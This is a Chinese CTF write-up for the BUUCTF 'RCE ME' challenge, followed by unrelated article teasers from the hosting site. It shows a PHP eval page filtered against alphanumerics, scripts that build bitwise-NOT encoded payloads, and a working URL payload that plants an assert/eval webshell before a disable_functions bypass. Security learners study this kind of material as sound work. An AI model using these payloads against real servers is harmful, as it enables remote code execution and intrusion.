[極客大挑戰 2019]RCE ME

[極客大挑戰 2019]RCE ME

<?php
error_reporting(0);
if(isset($_GET['code'])){$code=$_GET['code'];if(strlen($code)>40){die("This is too Long.");}if(preg_match("/[A-Za-z0-9]+/",$code)){die("NO.");}@eval($code);
}
else{highlight_file(__FILE__);
}// ?>

取反和異或均可繞過

<?php
$c='phpinfo()';
$d=urlencode(~$c);
$e=~($d);
if(preg_match("/[A-Za-z0-9]+/",$e)){echo 0;
}else {echo 1;
}?>

這個取反號寫在外面也沒事,慢慢試就發現寫里面才有效

?code=(~%8F%97%8F%96%91%99%90)();

然后我找了一下flag發現沒有,然后又找了一下不能使用的函數
在這里插入圖片描述
在這里插入圖片描述
7.0的版本我們還需要
我們需要調用eval拼接為assert(eval($_POST[a]))

<?php 
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "\n";
$c='eval($_POST[a])';
$d=urlencode(~$c);
echo $d;?>
?code=(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9E%A2%D6);

然后鏈接

http://a967fa8b-203d-4c2a-b4ab-11c784927d01.node5.buuoj.cn:81/?code=(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9E%A2%D6);
密碼是a

進入之后flag里面沒有flag而readflag是一個程序
在這里插入圖片描述
進入虛擬終端沒有權限
在這里插入圖片描述

使用插件
在這里插入圖片描述
php7這兩個都可以,我們剛才看了php版本的
在這里插入圖片描述

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/43541.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/43541.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/43541.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

(附源碼)c#+winform實現遠程開機(廣域網可用)

實現邏輯 利用UDP協議發送特定格式的魔術包&#xff0c;以遠程喚醒具有特定MAC地址的目標計算機。目標計算機的BIOS和網絡配置需要支持Wake-on-LAN&#xff08;WOL&#xff09;功能&#xff0c;并且需要在目標計算機上配置正確的網絡喚醒設置。 源碼在最后 準備工作 進入Bio…

力學有限元的基石:虛功原理的推導

推導虛功方程的過程 彈性力學的平衡方程 在張量形式中&#xff0c;平衡方程為&#xff1a; ? ? σ b 0 \nabla \cdot \sigma b 0 ??σb0 用下標表示為&#xff1a; ? σ i j ? x j b i 0 \frac{\partial \sigma_{ij}}{\partial x_j} b_i 0 ?xj??σij??b…

知識圖譜入門筆記

自學參考&#xff1a; 視頻&#xff1a;斯坦福CS520 | 知識圖譜 最全知識圖譜綜述 詳解知識圖譜的構建全流程 知識圖譜構建&#xff08;概念&#xff0c;工具&#xff0c;實例調研&#xff09; 一、基本概念 知識圖譜&#xff08;Knowledge graph&#xff09;&#xff1a;由結…

Redis管理禁用命令

在redis數據量比較大時&#xff0c;執行 keys * &#xff0c;fluashdb 這些命令&#xff0c;會導致redis長時間阻塞&#xff0c;大量請求被阻塞&#xff0c;cpu飆升&#xff0c;嚴重可能導致redis宕機&#xff0c;數據庫雪崩。所以一些命令在生產環境禁止使用。 Redis 禁用命令…

【C語言】指針(3):探索-不同類型指針變量

目錄 一、字符指針變量 二、數組指針變量 三、二維數組傳參的本質 四、函數指針變量 4.1 函數指針變量 4.2 函數指針變量的使用 4.3 函數指針變量的拓展 五、函數指針數組 六、轉移表的應用 通過深入理解指針&#xff08;1&#xff09;和深入理解指針&#xff08;2&am…

67.SAP FICO-憑證類型學習

目錄 SAP憑證類型 憑證類型的作用 - OBA7 SAP默認的憑證類型更改 FI相應事務代碼默認憑證類型 - OBU1 對FB50、60、70默認憑證類型的更改 - OBZO 后勤貨物移動默認憑證類型 - OMBA 發貨憑證類型 收貨憑證類型 自動移動憑證類型 存貨盤點憑證類型 發票默認的憑證類…

深度學習Day-24:ResNeXt-50算法思考

&#x1f368; 本文為&#xff1a;[&#x1f517;365天深度學習訓練營] 中的學習記錄博客 &#x1f356; 原作者&#xff1a;[K同學啊 | 接輔導、項目定制] 要求&#xff1a; 閱讀給出代碼&#xff0c;判斷是否存在錯誤&#xff0c;正確與否都請給出你的思考&#xff1b;查找…

如何減少開發過程中的bug-數據庫篇

1.1慢查詢 1.1.1 是否命中索引 提起慢查詢&#xff0c;我們馬上就會想到加索引。如果一條SQL沒加索引&#xff0c;或者沒有命中索引的話&#xff0c;就會產生慢查詢。 索引哪些情況會失效&#xff1f; 查詢條件包含or&#xff0c;可能導致索引失效 如果字段類型是字符串&am…

LeetCode 0724.尋找數組的中心下標:前綴和(時空復雜度O(n)+O(1))

title: 724.尋找數組的中心下標 date: 2024-07-08 13:22:58 tags: [題解, LeetCode, 簡單, 數組, 前綴和] 【LetMeFly】724.尋找數組的中心下標&#xff1a;前綴和&#xff08;時空復雜度O(n)O(1)&#xff09; 力扣題目鏈接&#xff1a;https://leetcode.cn/problems/find-pi…

數據結構--二叉樹相關習題5(判斷二叉樹是否是完全二叉樹 )

1.判斷二叉樹是否是完全二叉樹 辨別&#xff1a; 不能使用遞歸或者算節點個數和高度來判斷。 滿二叉樹可以用高度和節點來判斷&#xff0c;因為是完整的。 但是完全二叉樹前面是滿的&#xff0c;但是最后一層是從左到右連續這種 如果仍然用這種方法的話&#xff0c;如下圖…

暑期備考2024小學生古詩文大會:吃透真題和知識點(持續)

2024年上海市小學生古詩文大會的自由報名初賽將于10月19日&#xff08;星期六&#xff09;正式開始&#xff0c;還有3個多月的時間。 為幫助孩子們備考&#xff0c;我持續分享往年上海小學生古詩文大會真題&#xff0c;這些題目來自我去重、合并后的1700在線題庫&#xff0c;每…

加密與安全_密鑰體系的三個核心目標之完整性解決方案

文章目錄 Pre機密性完整性1. 哈希函數&#xff08;Hash Function&#xff09;定義特征常見算法應用散列函數常用場景散列函數無法解決的問題 2. 消息認證碼&#xff08;MAC&#xff09;概述定義常見算法工作原理如何使用 MACMAC 的問題 不可否認性數字簽名&#xff08;Digital …

SketchUp Pro 2024:現代科技之詩意體驗

在那遙遠的唐朝&#xff0c;李白曾以詩酒為伴&#xff0c;游歷山川&#xff0c;揮灑才情。而今&#xff0c;若李白穿越時空&#xff0c;手握現代科技之利器——SketchUp Pro 2024&#xff0c;定會以詩意之筆&#xff0c;描繪這款軟件的神奇與魅力。 初識SketchUp Pro 2024 初…

Vue Router:History 模式 vs. Hash 模式

在開發 SPA&#xff08;單頁應用程序&#xff09;時&#xff0c;路由管理是不可或缺的一部分。Vue.js 框架中的 Vue Router 提供了兩種主要的路由模式&#xff1a;History 模式和 Hash 模式。理解這兩種模式的區別及其實現方式&#xff0c;對于開發和部署 Vue 應用至關重要。 …

k8s record 20240708

一、PaaS 云平臺 web界面 資源利用查看 Rancher 5臺 CPU 4核 Mem 4g 100g的機器 映射的目錄是指docker重啟后&#xff0c;數據還在 Rancher可以創建集群也可以托管已有集群 先docker 部署 Rancher&#xff0c;然后通過 Rancher 部署 k8s 想使用 kubectl 還要yum install 安…

如何分析前后端bug?

如何分析前后端bug&#xff0c;我來支你1??招 &#x1f4dd;一般通過查看接口的方式分析前后端bug。 . 【方法】&#xff1a; web項目&#xff0c;用瀏覽器自帶的F12抓包看接口請求。 app客戶端&#xff0c;一般用fiddler等工具進行抓包接口。 . ?用經典的電商項目舉例&…

應用軟件受到網絡攻擊怎么辦?

大家都知道在目前的互聯網社會中&#xff0c;大型的網絡游戲與電商網站企業是網絡攻擊的重要對象&#xff0c;同時軟件應用也無法避免地會受到各種網絡攻擊&#xff0c;那么當我們的軟件應用被攻擊時&#xff0c;該怎么辦呢&#xff1f; 首先我們可以使用高防CDN&#xff0c;安…

2. 年齡問題

年齡問題 題目描述 本題為填空題&#xff0c;只需要算出結果后&#xff0c;在代碼中使用輸出語句將所填結果輸出即可。 S 夫人一向很神秘。這會兒有人問起她的年齡&#xff0c;她想了想說&#xff1a; "2020 年前&#xff0c;我丈夫的年齡剛好是我的 22 倍&#xff0c;…

ATA-8035射頻功率放大器在聲動力療法中的應用

聲動力療法是一種基于聲波能量的治療方法&#xff0c;廣泛應用于醫療和美容領域。它利用高強度聚焦的聲波來實現切割、破碎或加熱組織&#xff0c;以治療各種疾病和美容問題。在聲動力療法中&#xff0c;射頻功率放大器起著至關重要的作用&#xff0c;它負責提供足夠的能量來激…

達夢數據庫的系統視圖v$auditrecords

達夢數據庫的系統視圖v$auditrecords 在達夢數據庫&#xff08;DM Database&#xff09;中&#xff0c;V$AUDITRECORDS 是專門用來存儲和查詢數據庫審計記錄的重要系統視圖。這個視圖提供了對所有審計事件的訪問權限&#xff0c;包括操作類型、操作用戶、時間戳、目標對象等信…